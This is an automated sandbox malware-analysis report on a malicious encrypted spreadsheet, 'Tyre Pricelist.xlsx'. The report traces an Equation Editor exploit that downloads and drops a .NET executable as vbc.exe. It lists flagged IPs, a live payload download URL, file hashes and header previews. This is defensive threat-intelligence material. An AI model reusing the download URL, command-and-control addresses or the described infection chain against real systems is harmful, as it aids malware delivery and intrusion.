http://fr.search.yahoo.com/ | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://rover.ebay.com | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://in.search.yahoo.com/ | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://img.shopzilla.com/shopzilla/shopzilla.ico | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://search.ebay.in/ | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://image.excite.co.jp/jp/favicon/lep.ico | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe (4x) | unknown
http://msk.afisha.ru/ | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://busca.igbusca.com.br//app/static/images/favicon.ico | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe (4x) | unknown
http://search.rediff.com/ | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://www.ya.com/favicon.ico | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://www.etmall.com.tw/favicon.ico | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe (4x) | unknown
http://it.search.dada.net/favicon.ico | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe (4x) | unknown
http://search.naver.com/ | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://www.google.ru/ | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://search.hanafos.com/favicon.ico | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe (4x) | unknown
http://cgi.search.biglobe.ne.jp/favicon.ico | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
http://www.abril.com.br/favicon.ico | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe (4x) | unknown
http://search.daum.net/ | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://search.naver.com/favicon.ico | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://search.msn.co.jp/results.aspx?q= | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe (4x) | unknown
http://www.clarin.com/favicon.ico | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://buscar.ozu.es/ | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://kr.search.yahoo.com/ | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://search.about.com/ | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://busca.igbusca.com.br/ | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://www.ask.com/ | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://www.priceminister.com/favicon.ico | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://www.cjmall.com/ | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://search.centrum.cz/ | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://suche.t-online.de/ | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://www.google.it/ | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://search.auction.co.kr/ | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
http://www.ceneo.pl/ | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://www.amazon.de/ | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv | explorer.exe, 00000008.00000000.2195836515.00000000041AD000.00000004.00000001.sdmp | false | | high
http://sads.myspace.com/ | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://busca.buscape.com.br/favicon.ico | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
http://www.pchome.com.tw/favicon.ico | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
http://browse.guardian.co.uk/favicon.ico | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
http://google.pchome.com.tw/ | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
http://list.taobao.com/browse/search_visual.htm?n=15&amp;q= | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://www.rambler.ru/favicon.ico | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://uk.search.yahoo.com/ | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://espanol.search.yahoo.com/ | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://www.ozu.es/favicon.ico | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://search.sify.com/ | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://openimage.interpark.com/interpark.ico | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://search.yahoo.co.jp/favicon.ico | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
http://search.ebay.com/ | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://www.gmarket.co.kr/ | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
http://search.nifty.com/ | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://searchresults.news.com.au/ | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
http://www.google.si/ | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://www.google.cz/ | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://www.soso.com/ | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://www.univision.com/ | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://search.ebay.it/ | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://images.joins.com/ui_c/fvc_joins.ico | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://www.asharqalawsat.com/ | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
http://busca.orange.es/ | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://cnweb.search.live.com/results.aspx?q= | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://search.yahoo.co.jp | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
http://www.target.com/ | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://buscador.terra.es/ | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
http://search.orange.co.uk/favicon.ico | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
http://www.iask.com/ | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
http://www.tesco.com/ | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://cgi.search.biglobe.ne.jp/ | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://search.seznam.cz/favicon.ico | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://suche.freenet.de/favicon.ico | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://search.interpark.com/ | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://search.ipop.co.kr/favicon.ico | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
http://search.espn.go.com/ | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://www.myspace.com/favicon.ico | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://search.centrum.cz/favicon.ico | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://p.zhongsou.com/favicon.ico | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://service2.bfast.com/ | explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmp | false
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    http://www.%s.comPAvbc.exe, 00000004.00000002.2195649466.00000000064A0000.00000002.00000001.sdmp, RegAsm.exe, 00000006.00000002.2219630675.0000000002120000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2189359116.0000000001C70000.00000002.00000001.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    low
                                                                                                                                    http://ariadna.elmundo.es/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://www.news.com.au/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      http://www.cdiscount.com/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://www.tiscali.it/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://it.search.yahoo.com/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://www.ceneo.pl/favicon.icoexplorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://www.servicios.clarin.com/explorer.exe, 00000008.00000000.2207343803.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                high

                                                                                                                                                Contacted IPs


                                                                                                                                                Public

IP | Domain | Country | ASN | ASN Name | Malicious
91.195.241.137 | unknown | Germany | 47846 | SEDO-ASDE | true
103.125.191.5 | unknown | Viet Nam | 135905 | VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN | true
180.215.92.80 | unknown | Singapore | 64050 | BCPL-SGBGPNETGlobalASNSG | true

                                                                                                                                                General Information

                                                                                                                                                Joe Sandbox Version:31.0.0 Red Diamond
                                                                                                                                                Analysis ID:321115
                                                                                                                                                Start date:20.11.2020
                                                                                                                                                Start time:11:22:16
                                                                                                                                                Joe Sandbox Product:CloudBasic
                                                                                                                                                Overall analysis duration:0h 9m 54s
                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                Report type:light
                                                                                                                                                Sample file name:Tyre Pricelist.xlsx
                                                                                                                                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed:13
                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                Number of injected processes analysed:1
                                                                                                                                                Technologies:
                                                                                                                                                • HCA enabled
                                                                                                                                                • EGA enabled
                                                                                                                                                • HDC enabled
                                                                                                                                                • AMSI enabled
                                                                                                                                                Analysis Mode:default
                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                Detection:MAL
                                                                                                                                                Classification:mal100.troj.expl.evad.winXLSX@15/3@3/3
                                                                                                                                                EGA Information:Failed
                                                                                                                                                HDC Information:
                                                                                                                                                • Successful, ratio: 21.3% (good quality ratio 20.1%)
                                                                                                                                                • Quality average: 70.9%
                                                                                                                                                • Quality standard deviation: 28.9%
                                                                                                                                                HCA Information:
                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                • Number of executed functions: 0
                                                                                                                                                • Number of non-executed functions: 0
                                                                                                                                                Cookbook Comments:
                                                                                                                                                • Adjust boot time
                                                                                                                                                • Enable AMSI
                                                                                                                                                • Found application associated with file extension: .xlsx
                                                                                                                                                • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                • Attach to Office via COM
                                                                                                                                                • Scroll down
                                                                                                                                                • Close Viewer
                                                                                                                                                Warnings:
                                                                                                                                                • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                                                                                                                                                • TCP Packets have been reduced to 100
                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                Simulations

                                                                                                                                                Behavior and APIs

Time | Type | Description
11:23:16 | API Interceptor | 97x Sleep call for process: EQNEDT32.EXE modified
11:23:20 | API Interceptor | 55x Sleep call for process: vbc.exe modified
11:23:26 | API Interceptor | 32x Sleep call for process: RegAsm.exe modified
11:23:43 | API Interceptor | 230x Sleep call for process: NETSTAT.EXE modified

                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                IPs

Match | Associated Sample Name / URL | Detection | Context
103.125.191.5 | 2eD17GZuWs.exe | malicious | 103.125.191.5/bin_xMjelaYnr43.bin
103.125.191.5 | Unique food order.xlsx | malicious | 103.125.191.5/bin_xMjelaYnr43.bin

                                                                                                                                                Domains

                                                                                                                                                No context

                                                                                                                                                ASN

Match | Associated Sample Name / URL | Detection | Context
SEDO-ASDE | new file.exe.exe | malicious | 91.195.241.136
SEDO-ASDE | Bonifico n.1101202910070714.exe | malicious | 91.195.241.136
SEDO-ASDE | hRVrTsMv25.exe | malicious | 91.195.241.136
SEDO-ASDE | v6k2UHU2xk.exe | malicious | 91.195.241.136
SEDO-ASDE | http://walmartmoneycard.xyz | malicious | 91.195.240.136
SEDO-ASDE | http://ww1.0ffice.com/ | malicious | 91.195.240.14
SEDO-ASDE | New Additional Agreement.exe | malicious | 91.195.240.94
SEDO-ASDE | UBEH7JEUC0.exe | malicious | 91.195.241.136
SEDO-ASDE | Additional Agreement 2020-KYC.exe | malicious | 91.195.240.94
SEDO-ASDE | H4A2-423-EM152-010.TIF.exe | malicious | 91.195.240.13
SEDO-ASDE | Additional Agreement 2020-KYC.exe | malicious | 91.195.240.94
SEDO-ASDE | ORDER7098EAR.exe | malicious | 91.195.241.136
SEDO-ASDE | mFNIsJZPe2.exe | malicious | 91.195.240.94
SEDO-ASDE | http://walmartmoneycard.xyz | malicious | 91.195.240.136
SEDO-ASDE | Additional Agreement 2020-KYC.exe | malicious | 91.195.240.94
SEDO-ASDE | AWB# 9284730932.exe | malicious | 91.195.240.94
SEDO-ASDE | DEWA PROJECT 12100317.exe | malicious | 91.195.240.94
SEDO-ASDE | http://tgreendot.com | malicious | 91.195.240.136
SEDO-ASDE | http://freeaccountnow.com | malicious | 91.195.240.136
SEDO-ASDE | http://krypton.rackage.co.uk | malicious | 91.195.240.87
VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN | 2eD17GZuWs.exe | malicious | 103.125.191.5
VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN | Unique food order.xlsx | malicious | 103.125.191.5
VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN | tt payment proof.xlsx | malicious | 103.125.191.187
VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN | TIE-3735-2020.xlsx | malicious | 103.125.191.229
VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN | payslip.s.xlsx | malicious | 103.125.191.187
VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN | Telex-relase.xlsx | malicious | 103.141.138.120
VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN | Y0L60XAhvo.rtf | malicious | 103.141.138.122
VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN | d6pj421rXA.exe | malicious | 103.139.45.59
VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN | 8YPssSkVtu.rtf | malicious | 103.141.138.87
VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN | PI098763556299.xlsx | malicious | 103.125.191.229
VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN | PIT12425009.xlsx | malicious | 103.125.191.229
VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN | wIeFid8p7Q.exe | malicious | 103.125.189.164
VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN | Dell ordine-09362-9-11-2020.exe | malicious | 103.139.45.59
VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN | shipping documents.xlsx | malicious | 103.133.108.6
VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN | shipping documents.xlsx | malicious | 103.133.108.6
VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN | EES RFQ 60-19__pdf.exe | malicious | 103.114.107.156
                                                                                                                                                Quotation_20CF18909.xlsxGet hashmaliciousBrowse
                                                                                                                                                • 103.141.138.122
                                                                                                                                                Quotation_20CF18909.xlsxGet hashmaliciousBrowse
                                                                                                                                                • 103.141.138.122
                                                                                                                                                Z08LsyTAN6.exeGet hashmaliciousBrowse
                                                                                                                                                • 103.125.189.164
                                                                                                                                                QUO_M.VECOQUEEN.xlsx.docxGet hashmaliciousBrowse
                                                                                                                                                • 103.125.191.123
                                                                                                                                                BCPL-SGBGPNETGlobalASNSGABSyodh8yx.exeGet hashmaliciousBrowse
                                                                                                                                                • 143.92.57.83
                                                                                                                                                tr2rgxBVl1.exeGet hashmaliciousBrowse
                                                                                                                                                • 143.92.57.83
                                                                                                                                                5kVcSS3v3q.exeGet hashmaliciousBrowse
                                                                                                                                                • 143.92.57.83
                                                                                                                                                VfXZcSLj.exeGet hashmaliciousBrowse
                                                                                                                                                • 14.128.35.30
                                                                                                                                                ORDERCONFIRMATION_PDF.exeGet hashmaliciousBrowse
                                                                                                                                                • 96.43.100.200
                                                                                                                                                Scan_PO238489923737483924.exeGet hashmaliciousBrowse
                                                                                                                                                • 180.215.112.164
                                                                                                                                                Remittance Scan DOC-2029293#PI207-048.exeGet hashmaliciousBrowse
                                                                                                                                                • 180.215.95.222
                                                                                                                                                PO8479349743085.exeGet hashmaliciousBrowse
                                                                                                                                                • 96.43.96.14
                                                                                                                                                PO#47974GH397.exeGet hashmaliciousBrowse
                                                                                                                                                • 96.43.96.14
                                                                                                                                                Maersk Kleven V949E.xlsxGet hashmaliciousBrowse
                                                                                                                                                • 118.107.13.191
                                                                                                                                                YDrnUOyMmD.exeGet hashmaliciousBrowse
                                                                                                                                                • 118.107.13.191
                                                                                                                                                https://thehighestleveloftheworld.top/f862d13454fd267baa5fedfffb200567/signin.php?country=ZA-South%20Africa&lang=enGet hashmaliciousBrowse
                                                                                                                                                • 118.107.14.220
                                                                                                                                                https://www.amazon.co.jp.d13f0fed4d24d232f3c591.net/mobile/Get hashmaliciousBrowse
                                                                                                                                                • 118.107.14.158
                                                                                                                                                https://amazon.account-update.amazon.co.jp.s8u913f0fed42f3c6a45b3.net/mobile/Get hashmaliciousBrowse
                                                                                                                                                • 118.107.14.139
                                                                                                                                                http://down.idc3389.top/downloader.exeGet hashmaliciousBrowse
                                                                                                                                                • 116.193.154.122

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe
Process: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: downloaded
Size (bytes): 599552
Entropy (8bit): 7.855744157979213
Encrypted: false
SSDEEP: 12288:K29Z0ZfOKYJqFwpzpYTnMS3hrrnplI5GJriD:f9WtZY7wTnT9npu5G0
MD5: 429BBA6DBE159C300679509BE3085665
SHA1: F79F58BC3142B59D0D8669595A01770BDF5486FF
SHA-256: 04274B027D3BD09EC0D7B58FF5AF64AA06E626668995CB5EF6D7FAD939BC6C33
SHA-512: 450A46356FB78D3E37E64F0EDC8A4197E2E22E8C29E36499D1F08FD00F6B38999E4534AC5165CDFA59D68A179EDE64362EF5CF27DCCD2719DDB0FDA9A599345D
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 33%
Reputation: low
IE Cache URL: http://workfinethdysanotherrainbowlomoyentthghf.ydns.eu/worksdoc/svchost.exe
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....._.............................=... ...@....@.. ..............................U.....@..................................=..O....@..B....................`....................................................... ............... ..H............text........ ...................... ..`.rsrc...B....@....... ..............@..@.reloc.......`.......$..............@..B.................=......H........................q...+..........................................a.b.d.c.e.f.g.h.i.j.k.l.m.n.p.r.q.s.t.u.v.w.z.y.x.0.1.2.3.4.5.6.7.8.9.A.B.C.D.E.F.G.H.I.J.K.L.M.N.Q.P.R.T.S.V.U.W.X.Y.Z.6..(....o....*B...(.....o....&*2.(....t....*.(....&*2.t....o....*F~....~....(.....*..*..(....*.(.........(....(.........(....(....o.........*&...o....*.(....*.(....*.r?..p.....*6..{b...(^...*..o.....{a...{c....{b...oZ...(^...*.so....p...*..oq...*V.{....od....(...+...*J.{....o1....ov...*J
C:\Users\user\Desktop\~$Tyre Pricelist.xlsx
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: data
Category: dropped
Size (bytes): 330
Entropy (8bit): 1.4377382811115937
Encrypted: false
SSDEEP: 3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
MD5: 96114D75E30EBD26B572C1FC83D1D02E
SHA1: A44EEBDA5EB09862AC46346227F06F8CFAF19407
SHA-256: 0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
SHA-512: 52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
Malicious: true
Reputation: moderate, very likely benign file
Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
C:\Users\Public\vbc.exe
Process: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 599552
Entropy (8bit): 7.855744157979213
Encrypted: false
SSDEEP: 12288:K29Z0ZfOKYJqFwpzpYTnMS3hrrnplI5GJriD:f9WtZY7wTnT9npu5G0
MD5: 429BBA6DBE159C300679509BE3085665
SHA1: F79F58BC3142B59D0D8669595A01770BDF5486FF
SHA-256: 04274B027D3BD09EC0D7B58FF5AF64AA06E626668995CB5EF6D7FAD939BC6C33
SHA-512: 450A46356FB78D3E37E64F0EDC8A4197E2E22E8C29E36499D1F08FD00F6B38999E4534AC5165CDFA59D68A179EDE64362EF5CF27DCCD2719DDB0FDA9A599345D
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 33%
Reputation: low
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....._.............................=... ...@....@.. ..............................U.....@..................................=..O....@..B....................`....................................................... ............... ..H............text........ ...................... ..`.rsrc...B....@....... ..............@..@.reloc.......`.......$..............@..B.................=......H........................q...+..........................................a.b.d.c.e.f.g.h.i.j.k.l.m.n.p.r.q.s.t.u.v.w.z.y.x.0.1.2.3.4.5.6.7.8.9.A.B.C.D.E.F.G.H.I.J.K.L.M.N.Q.P.R.T.S.V.U.W.X.Y.Z.6..(....o....*B...(.....o....&*2.(....t....*.(....&*2.t....o....*F~....~....(.....*..*..(....*.(.........(....(.........(....(....o.........*&...o....*.(....*.(....*.r?..p.....*6..{b...(^...*..o.....{a...{c....{b...oZ...(^...*.so....p...*..oq...*V.{....od....(...+...*J.{....o1....ov...*J

Static File Info

General

File type: CDFV2 Encrypted
Entropy (8bit): 7.996727168383382
TrID:
• Generic OLE2 / Multistream Compound File (8008/1) 100.00%
File name: Tyre Pricelist.xlsx
File size: 2481664
MD5: 3b5f7a2a0429e796040aa5bc3763a8fe
SHA1: c049ac5a44d034995a55bd5f49aece9631c69c1f
SHA256: 9853da661450f9b9a4c06dc952bc70d7cdd8e80cf7e9f8189f2d15682bd88434
SHA512: a345f1248ca41d2b88e05417c404ff3e57de909921b06a2543a79ef30ae62c1cfb5af2b5ba9ae13e2e500bb290951d3c356fe1b97990e32721b5093d6ea73766
SSDEEP: 49152:PYwpjAWZWQz/mAevYUEcg1udmyMc8gsD7iHqUg0hc:AwpsmswoVd3MCsD7iKAc
File Content Preview: ........................>...................&...........................................................................z.......|.......~...............z.......|.......~...............z.......|.......~...............z.......|..............................

File Icon

Icon Hash: e4e2aa8aa4b4bcb4

Static OLE Info

General

Document Type: OLE
Number of OLE Files: 1

OLE File "Tyre Pricelist.xlsx"

Indicators

Has Summary Info: False
Application Name: unknown
Encrypted Document: True
Contains Word Document Stream: False
Contains Workbook/Book Stream: False
Contains PowerPoint Document Stream: False
Contains Visio Document Stream: False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros: False

Streams

Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
General
Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
File Type: data
Stream Size: 64
Entropy: 2.73637206947
Base64 Encoded: False
Data ASCII: . . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
Data Raw: 08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
General
Stream Path: \x6DataSpaces/DataSpaceMap
File Type: data
Stream Size: 112
Entropy: 2.7597816111
Base64 Encoded: False
Data ASCII: . . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
